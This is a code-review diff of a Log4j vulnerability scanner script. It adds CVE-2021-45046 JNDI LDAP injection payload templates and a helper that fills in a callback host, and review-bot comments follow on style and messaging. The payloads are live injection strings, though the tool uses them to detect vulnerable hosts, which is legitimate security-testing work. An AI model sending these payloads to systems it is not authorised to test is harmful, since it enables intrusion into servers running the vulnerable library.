diff --git a/log4j-scan.py b/log4j-scan.py
index 091b384..120f07e 100755
--- a/log4j-scan.py
+++ b/log4j-scan.py
@@ -16,6 +16,7 @@
 from urllib import parse as urlparse
 import base64
 import json
+import random
 from uuid import uuid4
 from base64 import b64encode
 from Crypto.Cipher import AES, PKCS1_OAEP
@@ -60,7 +61,9 @@
 ]
 cve_2021_45046 = [
- "${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}" # Source: https://twitter.com/marcioalm/status/1471740771581652995
+ "${jndi:ldap://127.0.0.1#{{callback_host}}:1389/{{random}}}", # Source: https://twitter.com/marcioalm/status/1471740771581652995,
+ "${jndi:ldap://127.0.0.1#{{callback_host}}/{{random}}}",
+ "${jndi:ldap://127.1.1.1#{{callback_host}}/{{random}}}"
 ]
@@ -71,7 +74,7 @@
 action='store')
 parser.add_argument("-p", "--proxy",
 dest="proxy",
- help="Send requests through proxy. proxy should be specified in the format supported by requests (http[s]://:)",
+ help="send requests through proxy",
 action='store')
 parser.add_argument("-l", "--list",
 dest="usedlist",
@@ -130,7 +133,6 @@
 if args.proxy:
 proxies = {"http": args.proxy, "https": args.proxy}
-
 def get_fuzzing_headers(payload):
 fuzzing_headers = {}
 fuzzing_headers.update(default_headers)
@@ -162,6 +164,14 @@ def generate_waf_bypass_payloads(callback_host, random_string):
 payloads.append(new_payload)
 return payloads
+def get_cve_2021_45046_payloads(callback_host, random_string):
+ payloads = []
+ for i in cve_2021_45046:
+ new_payload = i.replace("{{callback_host}}", callback_host)
+ new_payload = new_payload.replace("{{random}}", random_string)
+ payloads.append(new_payload)
+ return payloads
+
 class Dnslog(object):
 def __init__(self):
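Review bot: `import random` is added in the first hunk but nothing in this diff uses it; the new `get_cve_2021_45046_payloads` helper receives `random_string` from its caller rather than generating one. If no other part of the change references `random`, drop the import so the module does not carry a dead dependency. If it is used elsewhere in the file, this is fine as is.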
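Review bot: The shortened `--proxy` help text drops the only hint of the accepted format, and the old text already looks mangled (`(http[s]://:)` reads like a stripped `host:port` placeholder). Since the value is passed straight into the `proxies` dict for `requests`, users benefit from knowing the expected shape; suggest `help="send requests through a proxy, in the format accepted by requests (http[s]://host:port)"`. This keeps the terse style of the other help strings while restoring the information the commit removes.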
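Review bot: `get_cve_2021_45046_payloads` has no docstring and hand-rolls the same substitute-and-append loop that the context lines of `generate_waf_bypass_payloads` end with (that function starts outside the hunk, so I am inferring the shared shape from its visible `payloads.append` / `return payloads` tail). A one-line docstring such as `"""Return the CVE-2021-45046 probe strings with {{callback_host}} and {{random}} filled in."""` would state the contract, and the body collapses to `return [i.replace("{{callback_host}}", callback_host).replace("{{random}}", random_string) for i in cve_2021_45046]`. If the two helpers really do the same substitution over different template lists, a single private `_fill_templates(templates, callback_host, random_string)` that both call would remove the duplication.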
@@ -276,7 +286,9 @@ def scan_url(url, callback_host):
 if args.waf_bypass_payloads:
 payloads.extend(generate_waf_bypass_payloads(f'{parsed_url["host"]}.{callback_host}', random_string))
 if args.cve_2021_45046:
- payloads = cve_2021_45046
+ cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow")
+ payloads = get_cve_2021_45046_payloads(f'{parsed_url["host"]}.{callback_host}', random_string)
+
 for payload in payloads:
 cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan")
 if args.request_type.upper() == "GET" or args.run_all_tests:
@@ -337,7 +349,7 @@ def main():
 dns_callback_host = ""
 if args.custom_dns_callback_host:
 cprint(f"[•] Using custom DNS Callback host [{args.custom_dns_callback_host}]. No verification will be done after sending fuzz requests.")
- dns_callback_host = args.custom_dns_callback_host
+ dns_callback_host = args.custom_dns_callback_host
 else:
 cprint(f"[•] Initiating DNS callback server ({args.dns_callback_provider}).")
 if args.dns_callback_provider == "interact.sh":
@@ -362,7 +374,7 @@ def main():
 time.sleep(int(args.wait_time))
 records = dns_callback.pull_logs()
 if len(records) == 0:
- cprint("[•] Reachable Targets do not seem to be vulnerable.", "green")
+ cprint("[•] Targets does not seem to be vulnerable.", "green")
 else:
 cprint("[!!!] Target Affected", "yellow")
 for i in records:
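Review bot: In `scan_url`, `payloads = get_cve_2021_45046_payloads(...)` still replaces the whole list, so when `--waf-bypass-payloads` and `--cve-2021-45046` are both given the WAF-bypass payloads extended on the line above are silently discarded; the old code had the same shape, but the commit is the moment to decide whether that is intended. If CVE-2021-45046 is meant to be an exclusive mode, say so in the `-cve-2021-45046` help text and in a comment here (`# CVE-2021-45046 mode replaces, not extends, the payload set`); if not, use `payloads.extend(...)`. Separately, the new `cprint(f"[•] Scanning for CVE-2021-45046 ...")` has no placeholders, so the `f` prefix should go. `scan_url` continues outside this hunk.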
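Review bot: The reworded message in the last hunk introduces a grammar error ("Targets does not seem") and, more importantly, overstates what an empty `records` list proves: no DNS callback within `wait_time` can also mean egress filtering, a delayed lookup, or a target that was never reached. Suggest `cprint("[•] No callbacks received within the wait window; targets do not seem to be vulnerable.", "green")` so the operator reads it as an absence of evidence rather than a clean bill. `main` continues outside this hunk.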